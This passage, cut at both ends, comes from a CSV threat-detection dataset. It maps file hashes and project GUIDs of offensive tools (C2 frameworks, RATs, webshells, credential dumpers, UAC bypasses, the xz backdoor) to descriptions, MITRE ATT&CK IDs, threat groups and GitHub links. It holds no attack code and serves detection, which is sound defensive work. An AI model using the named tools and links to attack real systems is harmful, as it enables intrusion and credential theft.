Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23264" "*2329a9ff31f85b197f5d1ce5af29167de3027b0b80e786080ab2a7bd046b8dd9*",".{0,1000}2329a9ff31f85b197f5d1ce5af29167de3027b0b80e786080ab2a7bd046b8dd9.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","23265" "*233c1188ee1bfe659c4403fda91ac1ce114d9f44f6478cbbe9e8fa22b1e6c600*",".{0,1000}233c1188ee1bfe659c4403fda91ac1ce114d9f44f6478cbbe9e8fa22b1e6c600.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23269" "*233d29b4e60407aa550a2e5984ea0fb993f946fa6d83a5505963b4ff4703009f*",".{0,1000}233d29b4e60407aa550a2e5984ea0fb993f946fa6d83a5505963b4ff4703009f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23270" "*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*",".{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","23271" "*233d78a0eb44c9b9d7a92ee810f90dec29ab1778536c1b9f5d16c988ac0c70ab*",".{0,1000}233d78a0eb44c9b9d7a92ee810f90dec29ab1778536c1b9f5d16c988ac0c70ab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23272" "*234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0*",".{0,1000}234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23273" "*234cfdd1b014e769ee31cda9b6dd0a17c05f028a6e059e5bd4d01175e986dfb0*",".{0,1000}234cfdd1b014e769ee31cda9b6dd0a17c05f028a6e059e5bd4d01175e986dfb0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23274" "*234ed004a8866e65677b3454c2926ae39cf417bb7702290d6c716ec835c10607*",".{0,1000}234ed004a8866e65677b3454c2926ae39cf417bb7702290d6c716ec835c10607.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23275" "*2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a*",".{0,1000}2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23279" "*2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE*",".{0,1000}2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","23280" "*23779f962171cb3bb425ed7cc6aca741338b9340ede2eb8fa70aad40ddcfca8f*",".{0,1000}23779f962171cb3bb425ed7cc6aca741338b9340ede2eb8fa70aad40ddcfca8f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23283" "*237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00*",".{0,1000}237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23285" "*237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d*",".{0,1000}237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","23286" "*2380b9b4e364c67332ead5d26bf108ef9a022ffe93c421d27d953ea9a5500474*",".{0,1000}2380b9b4e364c67332ead5d26bf108ef9a022ffe93c421d27d953ea9a5500474.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23287" "*238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964*",".{0,1000}238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","23288" "*238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a*",".{0,1000}238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23289" "*2388c7f7f1073b922d235f675e32e1b6b8809dcef1cce1113bf712402cbad1cd*",".{0,1000}2388c7f7f1073b922d235f675e32e1b6b8809dcef1cce1113bf712402cbad1cd.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","23290" 
"*23975ac9-f51c-443a-8318-db006fd83100*",".{0,1000}23975ac9\-f51c\-443a\-8318\-db006fd83100.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","23291" "*2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8*",".{0,1000}2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23292" "*2399482e1dd2f112f6d8fa93eb353891eb896dcaad033c343080bca99aac4544*",".{0,1000}2399482e1dd2f112f6d8fa93eb353891eb896dcaad033c343080bca99aac4544.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23293" "*23a1cde43eee4ebc3c7082d5827672fbf974b25a4cdf368538e4b0af26fda677*",".{0,1000}23a1cde43eee4ebc3c7082d5827672fbf974b25a4cdf368538e4b0af26fda677.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - 
TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","23295" "*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*",".{0,1000}23A2E629\-DC9D\-46EA\-8B5A\-F1D60566EA09.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","23296" "*23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4*",".{0,1000}23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23297" "*23b63ec6ec2a3d5addcf3d67c8ce01f913f5eaf3a77159606c6d28deff2c8d6e*",".{0,1000}23b63ec6ec2a3d5addcf3d67c8ce01f913f5eaf3a77159606c6d28deff2c8d6e.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","23298" 
"*23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2*",".{0,1000}23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23299" "*23bdd25637e6945b0c825452e40d52f4c327f30f99fd609b71e6c6308c6a5622*",".{0,1000}23bdd25637e6945b0c825452e40d52f4c327f30f99fd609b71e6c6308c6a5622.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23301" "*23be181e368fdf883f49f13e1ff704c2763a6b08dc1206985408b8e428440049*",".{0,1000}23be181e368fdf883f49f13e1ff704c2763a6b08dc1206985408b8e428440049.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23302" "*23bf773ba87ff687e14a90a2c0e552eb9b04abba32dcf81d9473f921dd44b99a*",".{0,1000}23bf773ba87ff687e14a90a2c0e552eb9b04abba32dcf81d9473f921dd44b99a.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows 
environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","23303" "*23bffbd2241b534574b8a9149c2502da4960f3a185437a9f983e51eebaf8ee1d*",".{0,1000}23bffbd2241b534574b8a9149c2502da4960f3a185437a9f983e51eebaf8ee1d.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23304" "*23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba*",".{0,1000}23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","23307" "*23d95cfa93563a5a187125ae4caac02f2cad2132b382b2bdb9b36a28b23194af*",".{0,1000}23d95cfa93563a5a187125ae4caac02f2cad2132b382b2bdb9b36a28b23194af.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","23312" 
"*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*",".{0,1000}23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","#filehash","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","23313" "*23e1a48eba4387626c8cef3e9a8268a7e8ee36ad8e76bebfba79ce314dc4e90c*",".{0,1000}23e1a48eba4387626c8cef3e9a8268a7e8ee36ad8e76bebfba79ce314dc4e90c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23315" "*23e478a34911f053cd097f549ab4a75a249cc03e565f9aaf512af6bb44acc61d*",".{0,1000}23e478a34911f053cd097f549ab4a75a249cc03e565f9aaf512af6bb44acc61d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23316" "*23ecca2af6db4c425ab534b9a738f7ec152c7fcf3c250f3ce9d7f57e6259eac9*",".{0,1000}23ecca2af6db4c425ab534b9a738f7ec152c7fcf3c250f3ce9d7f57e6259eac9.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#filehash","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","23318" "*23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681*",".{0,1000}23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","23319" "*23ef7c9571eb00b307253eafdd5821d52ccfa9a4a7225e328c450d9f6657be16*",".{0,1000}23ef7c9571eb00b307253eafdd5821d52ccfa9a4a7225e328c450d9f6657be16.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","23320" "*23f017c0041a2164abfe06a03e3ad5b32e002e46d513f314632ed38280de8b14*",".{0,1000}23f017c0041a2164abfe06a03e3ad5b32e002e46d513f314632ed38280de8b14.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23321" "*23f16d48c7f318a3c087efe8ecfc2d7f6563890aae3e96680e7c22660e67c912*",".{0,1000}23f16d48c7f318a3c087efe8ecfc2d7f6563890aae3e96680e7c22660e67c912.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows 
(RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23322" "*23fcda1ac1f7e1d1644077f5e28759c56a93216e95b6a82e84654b6bfeb0acfd*",".{0,1000}23fcda1ac1f7e1d1644077f5e28759c56a93216e95b6a82e84654b6bfeb0acfd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23323" "*24046f3805d3bc40d71b96fdacae5e02d2bc41a47cb56e178aa92bf6c373177c*",".{0,1000}24046f3805d3bc40d71b96fdacae5e02d2bc41a47cb56e178aa92bf6c373177c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23326" "*240cce607e2c499182dd52342e9f93dc2869d22342d3cbf03b6330ce18dd38a7*",".{0,1000}240cce607e2c499182dd52342e9f93dc2869d22342d3cbf03b6330ce18dd38a7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23327" "*241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338*",".{0,1000}241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23329" "*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*",".{0,1000}2419CEDC\-BF3A\-4D8D\-98F7\-6403415BEEA4.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","#GUIDproject","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","23330" "*241aa661189fa38aa2519055d8145944658c9234282a3dee30ab625eba575464*",".{0,1000}241aa661189fa38aa2519055d8145944658c9234282a3dee30ab625eba575464.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
